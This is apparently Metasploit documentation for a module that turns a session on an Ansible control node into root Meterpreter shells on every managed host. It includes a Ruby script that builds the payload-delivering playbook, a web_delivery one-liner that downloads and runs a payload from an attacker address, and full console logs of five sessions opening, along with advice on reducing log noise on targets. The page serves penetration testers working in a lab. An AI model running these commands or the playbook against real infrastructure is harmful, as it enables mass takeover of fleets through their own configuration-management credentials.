
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/local/ansible_node_deployer.md

Vulnerable Application

This exploit module turns an existing session on an Ansible control node into sessions on the nodes that control node manages. It generates a new YAML playbook that copies our payload to every selected target (the `HOSTS` pattern, default `all`), chmods it executable, and then runs it, all over Ansible's own SSH connections and inventory credentials. Nothing is exploited on the managed nodes themselves: the payload runs with whatever privileges the inventory's remote user already has on each host (root in the lab below).

Docker-compose Install

Use the ansible lab files located here.

Before bringing up the docker-compose instance, generate the SSH key the lab expects:

```
ssh-keygen -t rsa -N "" -f secrets/id_rsa
```

Of note, only one of the three Alpine hosts will come up successfully because of a port conflict. That is fine for this exercise.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Get an initial session on the Ansible control node
  4. Do: `use exploit/linux/local/ansible_node_deployer`
  5. Do: `set session [#]`
  6. Do: `run`
  7. You should get sessions on all the targeted hosts

Options

ANSIBLEPLAYBOOK

Location of the ansible executable if it is not in a standard location. This is added to the list of default locations searched, which includes `/usr/local/bin/ansible`. Defaults to empty (search the standard locations only).

WritableDir

A directory on the compromised host (the Ansible control node holding the session) where we can write our payload. Defaults to `/tmp`

TargetWritableDir

A directory on the managed target hosts where the playbook will place the payload. Defaults to `/tmp`

CALCULATE

This will calculate how many hosts may be exploitable by using Ansible's `ping` module. This is not an ICMP ping: the module connects to each inventory host over SSH and confirms a usable Python interpreter, so a host that answers `pong` is one the playbook tasks can run on. The results are stored in loot and the module pauses briefly so the run can be aborted if the host count is not what you expected.

HOSTS

Which Ansible host or group pattern to target. Defaults to `all`

ListenerTimeout

How many seconds to wait after executing the payload for hosts to call back. If set to `0`, wait forever. Defaults to `60`
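The two behaviours described above, the `CALCULATE` pre-check and the generated playbook, are illustrated below in plain Ruby. This is an added example written for this page, not the module's own code: it uses no Metasploit APIs, the sample `ansible -m ping` output is constructed (two reachable hosts and one that fails SSH), and the `async`/`poll: 0` on the final task is an assumption about how to keep a long-lived payload from stalling the play rather than a claim about what the real module emits.

```ruby
require 'json'
require 'yaml'

# Constructed sample of `ansible <pattern> -m ping` output (not captured from
# the lab). One host is deliberately unreachable so the filter has something
# to reject.
SAMPLE_PING_OUTPUT = <<~'OUT'
  alpine-example-com | SUCCESS => {
      "ansible_facts": {
          "discovered_interpreter_python": "/usr/bin/python"
      },
      "changed": false,
      "ping": "pong"
  }
  rhel8-example-com | SUCCESS => {
      "changed": false,
      "ping": "pong"
  }
  decom-example-com | UNREACHABLE! => {
      "changed": false,
      "msg": "Failed to connect to the host via ssh: No route to host",
      "unreachable": true
  }
OUT

# Each host block looks like "<host> | <STATUS> => {json}" with the closing
# brace of the pretty-printed JSON at column 0; split on that shape.
def parse_ansible_ping(output)
  output.scan(/^(\S+) \| ([A-Z]+!?) => (\{.*?^\})/m).map do |host, status, body|
    { host: host, status: status, data: JSON.parse(body) }
  end
end

# A host is worth targeting only when the ping module actually executed there
# and answered "pong": that proves SSH access plus a working Python
# interpreter, which is exactly what copy/file/command will need.
def pingable_hosts(output)
  parse_ansible_ping(output)
    .select { |r| r[:status] == 'SUCCESS' && r[:data]['ping'] == 'pong' }
    .map { |r| r[:host] }
end

# Build the playbook: copy the payload to TargetWritableDir, mark it
# executable, then run it. The tasks mirror the task names seen in the
# module's run log (ansible.builtin.copy, ansible.builtin.file, command).
def build_playbook(hosts:, target_dir:, payload_src:)
  remote = File.join(target_dir, File.basename(payload_src))
  [{
    'name'  => 'Deliver Meterpreter',
    'hosts' => hosts,
    'tasks' => [
      { 'ansible.builtin.copy' => { 'src' => payload_src, 'dest' => remote } },
      { 'ansible.builtin.file' => { 'path' => remote, 'mode' => '0755' } },
      # async/poll: 0 is an assumption of this example so a reverse shell that
      # never exits does not block the play until its timeout.
      { 'command' => remote, 'async' => 10, 'poll' => 0 }
    ]
  }]
end

def playbook_yaml(**kw)
  YAML.dump(build_playbook(**kw))
end

if __FILE__ == $PROGRAM_NAME
  hosts = pingable_hosts(SAMPLE_PING_OUTPUT)
  puts "#{hosts.size} pingable host(s): #{hosts.join(', ')}"
  puts playbook_yaml(hosts: 'all', target_dir: '/tmp', payload_src: '/tmp/O514h2N')
end
```

`hosts:` accepts any Ansible pattern, so passing `pingable_hosts(...).join(',')` instead of `'all'` limits the play to hosts that already answered the ping, which is the tighter choice on an engagement where unreachable inventory entries would only generate failed-connection noise in the target's logs.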

Scenarios

Docker compose as mentioned above

Get initial access to the system

```
resource (ansible_deploy.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (ansible_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ansible_deploy.rb)> set srvport 8181
srvport => 8181
resource (ansible_deploy.rb)> set target 7
target => 7
resource (ansible_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (ansible_deploy.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8181/2BQIMgeywC6gGt9
[*] Server started.
[*] Run the following command on the target machine:
wget -qO OHZQobFE --no-check-certificate http://1.1.1.1:8181/2BQIMgeywC6gGt9; chmod +x OHZQobFE; ./OHZQobFE& disown
[*] 172.22.0.7       web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.7
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.22.0.7:49612) at 2023-12-15 20:12:27 -0500
```

Run the module against that session:

```
resource (ansible_deploy.rb)> use exploit/linux/local/ansible_node_deployer
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
resource (ansible_deploy.rb)> set session 1
session => 1
resource (ansible_deploy.rb)> set verbose true
verbose => true
resource (ansible_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ansible_deploy.rb)> set lport 9999
lport => 9999
[*] Starting persistent handler(s)...
[msf](Jobs:1 Agents:0) exploit(linux/local/ansible_node_deployer) >
[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > set TargetWritableDir /etc/
TargetWritableDir => /etc/
[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/local/ansible_node_deployer) >
[*] Started reverse TCP handler on 1.1.1.1:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[+] /tmp is writable, and ansible executable found
[+] The target is vulnerable.
[+] Stored pings to: /root/.msf4/loot/20231215201340_default_172.22.0.7_ansible.ping_422232.txt
[+] Ansible Pings
=============

Host                       Status   Ping  Changed
----                       ------   ----  -------
alpine-example-com         SUCCESS  pong  false
alpinesystemd-example-com  SUCCESS  pong  false
centos7-example-com        SUCCESS  pong  false
rhel8-example-com          SUCCESS  pong  false

[+] 4 ansible hosts were pingable, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
[*] Creating yaml job to execute
[*] Writing payload
[*] Writing '/tmp/O514h2N' (250 bytes) ...
[*] Executing ansible job
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.6
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.4
[+] Stored run logs to: /root/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.5
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.2
[*] Meterpreter session 2 opened (1.1.1.1:9999 -> 172.22.0.6:60850) at 2023-12-15 20:14:36 -0500
[*] Meterpreter session 5 opened (1.1.1.1:9999 -> 172.22.0.2:34980) at 2023-12-15 20:14:36 -0500
[*] Meterpreter session 3 opened (1.1.1.1:9999 -> 172.22.0.4:51082) at 2023-12-15 20:14:46 -0500
[*] Meterpreter session 4 opened (1.1.1.1:9999 -> 172.22.0.5:41770) at 2023-12-15 20:14:56 -0500
[msf](Jobs:2 Agents:5) exploit(linux/local/ansible_node_deployer) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information        Connection
  --  ----  ----                   -----------        ----------
  1         meterpreter x64/linux  root @ 172.22.0.7  1.1.1.1:4444 -> 172.22.0.7:49612 (172.22.0.7)
  2         meterpreter x64/linux  root @ 172.22.0.6  1.1.1.1:9999 -> 172.22.0.6:60850 (172.22.0.6)
  3         meterpreter x64/linux  root @ 172.22.0.4  1.1.1.1:9999 -> 172.22.0.4:51082 (172.22.0.4)
  4         meterpreter x64/linux  root @ 172.22.0.5  1.1.1.1:9999 -> 172.22.0.5:41770 (172.22.0.5)
  5         meterpreter x64/linux  root @ 172.22.0.2  1.1.1.1:9999 -> 172.22.0.2:34980 (172.22.0.7)
```
The playbook run log stored in loot shows the copy, file and command tasks executing on each managed node:

```
└─$ cat ~/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt

PLAY [Deliver Meterpreter] *****************************************************

TASK [Gathering Facts] *********************************************************
[DEPRECATION WARNING]: Distribution redhat 8.2 on host rhel8-example-com should use /usr/libexec/platform-python, but is using /usr/bin/python for backward compatibility with prior Ansible releases. A future Ansible release will default to using the discovered platform python for this host. See https://docs.ansible.com/ansible/2.9/reference_appendices/interpreter_discovery.html for more information. This feature will be removed in version 2.12. Deprecation warnings can be disabled by setting deprecation_warnings=False in ansible.cfg.
ok: [rhel8-example-com]
ok: [centos7-example-com]
[WARNING]: Platform linux on host alpine-example-com is using the discovered Python interpreter at /usr/bin/python, but future installation of another Python interpreter could change this. See https://docs.ansible.com/ansible/2.9/reference_appendices/interpreter_discovery.html for more information.
ok: [alpine-example-com]
[WARNING]: Platform linux on host alpinesystemd-example-com is using the discovered Python interpreter at /usr/bin/python, but future installation of another Python interpreter could change this. See https://docs.ansible.com/ansible/2.9/reference_appendices/interpreter_discovery.html for more information.
ok: [alpinesystemd-example-com]

TASK [ansible.builtin.copy] ****************************************************
changed: [alpine-example-com]
changed: [centos7-example-com]
changed: [rhel8-example-com]
changed: [alpinesystemd-example-com]

TASK [ansible.builtin.file] ****************************************************
changed: [alpine-example-com]
changed: [rhel8-example-com]
changed: [centos7-example-com]
changed: [alpinesystemd-example-com]

TASK [command] *****************************************************************
```